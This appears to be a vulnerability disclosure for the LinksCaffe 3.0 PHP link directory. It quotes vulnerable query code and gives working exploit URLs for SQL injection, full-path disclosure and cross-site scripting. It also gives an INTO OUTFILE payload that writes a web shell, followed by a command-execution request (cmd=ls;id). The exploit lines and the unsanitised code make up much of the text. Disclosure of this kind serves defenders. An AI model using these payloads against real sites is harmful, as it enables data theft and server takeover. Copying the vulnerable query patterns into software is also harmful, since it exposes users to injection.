|
|
LinksCaffe 3.0 SQL injection/Command Execution Vulnerabilties=0D
=0D
Produce : LinksCaffe 3.0=0D
Website : http://gonafish.com/=0D
Impact : manupulation of data / system access=0D
Discovered by : Simo64 - Moroccan Security Team=0D
=0D
[+] SQL injection=0D
******************=0D
=0D
[1]Vulnerable code in line 223 in links.php=0D
=0D
code : =0D
=0D
$rime = mysql_query("SELECT * from links WHERE link_val like 'yes' AND cat_id LIKE '$cat' ORDER BY hits DESC, link_pop DESC, rate DESC LIMIT $offset, $limit") or die(mysql_error());=0D
=0D
$offset and $limit vars are not sanitized before to be used to conducte sql injection attacks=0D
=0D
Exploit : =0D
=0D
http://localhost/linkscaffe/links.php?cat=1&offset=[SQL]=0D
http://localhost/linkscaffe/links.php?cat=1&limit=[SQL]=0D
=0D
[2] Vulnerable code in line 516 in links.php=0D
=0D
code : =0D
=0D
if (!$newdays)=0D
{=0D
$newdays=$daysnew;=0D
}=0D
else=0D
{=0D
$newdays=$newdays;=0D
}=0D
=0D
$rime1 = mysql_query("SELECT COUNT(*) from links WHERE (to_days(NOW()) - to_days(links.date)) <= $newdays AND link_val = 'yes'") or die(mysql_error());=0D
=0D
Exploit :=0D
http://localhost/linkscaffe/links.php?action=new&newdays=[SQL]=0D
=0D
=0D
[3] Vulnerable code in line 516 in links.php=0D
=0D
code :=0D
=0D
if ($action=="deadlink")=0D
{=0D
........=0D
$rime = mysql_query("SELECT * from links WHERE link_id=$link_id") or die(mysql_error());=0D
while($row = mysql_fetch_array($rime)) {=0D
extract($row);=0D
echo "
$link_desc
";=0D
}=0D
=0D
$link_id var are not sanitized before to be used to conducte sql injection attacks=0D
=0D
Exploit :=0D
=0D
http://localhost/linkscaffe/links.php?action=deadlink&link_id=[SQL]=0D
=0D
[+] FullPath disclosure :=0D
=0D
PoC : =0D
=0D
http://localhost/linkscaffe/links.php?action=new&newdays=-1+UNION+SELECT+123456/*=0D
=0D
Result :=0D
=0D
Warning: Supplied argument is not a valid MySQL result resource in /usr/home/simo64/linkscaffe/links.php on line 540=0D
=0D
Warning: Supplied argument is not a valid MySQL result resource in /usr/home/simo64/linkscaffe/links.php on line 549=0D
=0D
Warning: Supplied argument is not a valid MySQL result resource in /usr/home/simo64/linkscaffe/links.php on line 554=0D
=0D
[+] Remote Command Execution=0D
*****************************=0D
=0D
if magic_quote_gpc == OFF we can create a shell in writable folder using (3)!!=0D
=0D
Exploit :=0D
=0D
http://localhost/linkscaffe/links.php?action=deadlink&link_id=-1+UNION+SELECT+0,0,0,0,'',0,0,0,0,0,0,0,0,0,0%20INTO%20OUTFILE%20'/usr/home/simo64/linkscaffe/pipo.php'/*=0D
=0D
after we can exec cmds=0D
=0D
http://localhost/linkscaffe/pipo.php?cmd=ls;id=0D
=0D
=0D
=0D
[+] Cross Site Scripting =0D
*************************=0D
=0D
$tablewidth var in counter.php is not sanitized before to be used to conducte xss attacks=0D
$newdays var in links.php is not sanitized before to be used to conducte xss attacks=0D
$tableborder,$menucolor,$textcolor,$bodycolor vars in links.php are not sanitized before to be used to conducte xss attacks=0D
=0D
PoC : =0D
=0D
http://localhost/linkscaffe/counter.php?tablewidth='%3E[XSS]